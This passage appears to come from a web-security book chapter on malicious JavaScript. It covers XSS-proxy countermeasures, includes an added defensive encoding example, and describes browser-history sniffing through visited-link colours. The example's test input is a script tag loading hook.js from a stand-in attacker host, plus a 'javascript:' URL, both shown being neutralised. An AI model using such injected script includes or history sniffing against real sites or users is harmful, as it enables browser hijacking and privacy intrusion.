Figure 4-4 shows an example.
JavaScript Proxies Countermeasure
Countermeasures for malicious JavaScript proxies are the same as those used for XSS
attacks: input filtering and output validation. This is because JavaScript proxies are
generally utilized once an XSS flaw has been identified in a target web application. An
additional countermeasure for users is to use a browser plug-in such as NoScript
(http://noscript.net/) for Firefox, which disables JavaScript by default.
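The following added example (not code from the book) sketches both countermeasures on the server side: an allowlist input filter plus output encoding for HTML content and URL attributes. The function names, the base URL, and the sample input are all constructed for illustration.

```javascript
// Added example; filterUsername, encodeHtml, safeHref and renderComment are hypothetical names.

// Input filtering: accept only what the field is meant to hold (allowlist).
function filterUsername(input) {
  return typeof input === 'string' && /^[A-Za-z0-9_.-]{1,32}$/.test(input) ? input : null;
}

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Output encoding for HTML element content and quoted attribute values.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// URL attributes also need a scheme check: encoding alone does not stop "javascript:" URLs.
function safeHref(value) {
  let url;
  try {
    url = new URL(String(value), 'https://app.example/'); // constructed base URL
  } catch (e) {
    return '#';
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? encodeHtml(url.href) : '#';
}

// Build one comment: filter the username, encode everything that reaches the page.
function renderComment(user, text, link) {
  const name = filterUsername(user);
  if (name === null) throw new Error('rejected username');
  return `<p><a href="${safeHref(link)}">${encodeHtml(name)}</a>: ${encodeHtml(text)}</p>`;
}

// Constructed input: a script include of the kind a JavaScript proxy depends on.
const hostile = '<script src="https://attacker.example/hook.js"></script>';
console.log(renderComment('alice', hostile, 'javascript:alert(1)'));
```

The injected tag is emitted as inert text and the `javascript:` link collapses to `#`, so the browser never loads the remote script.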
Figure 4-4 The BeEF proxy with a victim attached
Chapter 4: Malicious JavaScript and AJAX 95
Visited URL Enumeration
Popularity: 5
Simplicity: 7
Impact: 8
Risk Rating: 7
In addition to hijacking control of a victim's browser through the use of XSS proxies,
malicious JavaScript can also be used to compromise a victim's privacy significantly by
determining the victim's browsing history. In this attack, first published by Jeremiah
Grossman, an attacker uses a combination of JavaScript and XSS to obtain a victim's
browsing history. The attacker uses CSS to set the color of visited URLs to a known color
value. Then, JavaScript is used to loop through a list of URLs and examine their color
values.